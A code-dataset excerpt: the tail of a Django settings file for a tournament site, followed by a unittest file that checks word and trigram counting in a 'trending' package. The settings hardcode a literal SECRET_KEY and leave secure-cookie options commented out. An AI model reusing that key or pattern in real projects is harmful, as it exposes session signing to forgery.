'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Amsterdam'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = os.path.join(ROOT_DIR, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = os.path.join(ROOT_DIR, 'static')
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(DJANGO_PROJECT_DIR, 'static'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
]
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'u_$=j1yn4iil1e6y358std&4h1t!57m9ddwr#4069_!4%2p$su'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# External middleware.
'maintenancemode.middleware.MaintenanceModeMiddleware',
'axes.middleware.FailedLoginMiddleware'
]
ROOT_URLCONF = 'bfeu.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'bfeu.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(DJANGO_PROJECT_DIR, 'templates'),
)
FIXTURE_DIRS = (
os.path.join(DJANGO_PROJECT_DIR, 'fixtures'),
)
INSTALLED_APPS = [
# Note: contenttypes should be first, see Django ticket #10827
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Optional applications.
'django.contrib.admin',
#'django.contrib.humanize',
#'django.contrib.sitemaps',
# External applications.
'axes',
'south',
'compressor',
# Project applications.
'bfeu.tournaments'
]
LOGGING_DIR = os.path.join(ROOT_DIR, 'log')
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(asctime)s %(levelname)s %(name)s %(module)s %(process)d %(thread)d %(message)s'
},
'timestamped': {
'format': '%(asctime)s %(levelname)s %(name)s %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
'performance': {
'format': '%(asctime)s %(process)d | %(thread)d | %(message)s',
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
},
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'timestamped'
},
'django': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(LOGGING_DIR, 'django.log'),
'formatter': 'verbose'
},
'project': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(LOGGING_DIR, 'bfeu.log'),
'formatter': 'verbose'
},
'performance': {
'level': 'INFO',
'class': 'logging.FileHandler',
'filename': os.path.join(LOGGING_DIR, 'performance.log'),
'formatter': 'performance'
},
},
'loggers': {
'bfeu': {
'handlers': ['project'],
'level': 'INFO',
'propagate': True,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
#
# Additional Django settings
# Enable these when using HTTPS
#
SESSION_COOKIE_NAME = 'bfeusessionid'
# SESSION_COOKIE_SECURE = True
# SESSION_COOKIE_HTTPONLY = True
# CSRF_COOKIE_SECURE = True
# X_FRAME_OPTIONS = 'DENY'
#
# Django-axes
#
AXES_LOGIN_FAILURE_LIMIT = 3 # Default: 3
AXES_LOCK_OUT_AT_FAILURE = True # Default: True
AXES_USE_USER_AGENT = False # Default: False
| mit | -1,098,656,257,339,263,600 | 30.912698 | 127 | 0.642502 | false |
leecannon/trending | trending/tests/test_count.py | 1 | 3138 | # Copyright (c) 2016 Lee Cannon
# Licensed under the MIT License, see included LICENSE File
from unittest import TestCase
from trending import count
from trending import interaction
def _create_test_interactions():
i = interaction.Interaction('12/10/2016 03:15:55', 'ENTERPRISE ENTERPRISE USER DIRECTORY', 'DIIR-GB-BOU',
'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i2 = interaction.Interaction('12/10/2016 03:45:55', 'ENTERPRISE USER DIRECTORY', 'DIIR-GB-BOU',
'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i3 = interaction.Interaction('12/10/2016 03:45:55', 'dial tone', 'DIIR-GB-BOU',
'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i4 = interaction.Interaction('12/10/2016 03:45:55', '**modnet**modnet outlook user', 'DIIR-GB-CRN',
'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i5 = interaction.Interaction('12/10/2016 03:45:55', 'modnet outlook USER complaint complaint*email,email-email',
'DIIR-GB-ABW', 'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
i6 = interaction.Interaction('12/10/2016 03:45:55', 'modnet outlook USER complaint complaint*email,email-email',
'DIIR-GB-OWN', 'JONESD302@DIIR', 'DAYR110@DIIR', 'UK-SD002808024')
return [i, i2, i3, i4, i5, i6]
class TestCount(TestCase):
def setUp(self):
self.interactions = _create_test_interactions()
def test_Number(self):
self.assertEqual(count.count_interactions(self.interactions), len(self.interactions))
def test_CountTrigrams(self):
temp = count.count_trigrams(self.interactions, minimum=0)
for trigram in temp:
if trigram[0] == 'BOU':
self.assertEqual(trigram[1], 3)
elif trigram[0] == 'CRN':
self.assertEqual(trigram[1], 1)
elif trigram[0] == 'ABW':
self.assertEqual(trigram[1], 1)
temp = count.count_trigrams(self.interactions, minimum=0, include_unknown=True)
self.assertTrue(('OWN', 1) in temp)
def test_CountWords(self):
temp = count.count_words(self.interactions)
self.assertEqual(sorted(temp), sorted([
('outlook', 3),
('modnet', 3),
('directory', 2),
('enterprise', 2)
]))
def test_CountWordsAtTrigram(self):
temp = count.count_words_at_trigrams(self.interactions, ['BOU'])
self.assertEqual(sorted(temp), sorted([
('directory', 2),
('enterprise', 2)
]))
temp = count.count_words_at_trigrams(self.interactions, ['ABW'])
self.assertEqual(temp, [])
temp = count.count_words_at_trigrams(self.interactions, ['BOU', 'ABW'])
self.assertEqual(sorted(temp), sorted([
('directory', 2),
('enterprise', 2)
]))
def test_CountTrigramWithWord(self):
temp = count.count_trigram_with_words(self.interactions, ['directory'])
self.assertEqual(temp, [('BOU', 2)])
| mit | -4,855,461,745,092,158,000 | 44.478261 | 116 | 0.59369 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.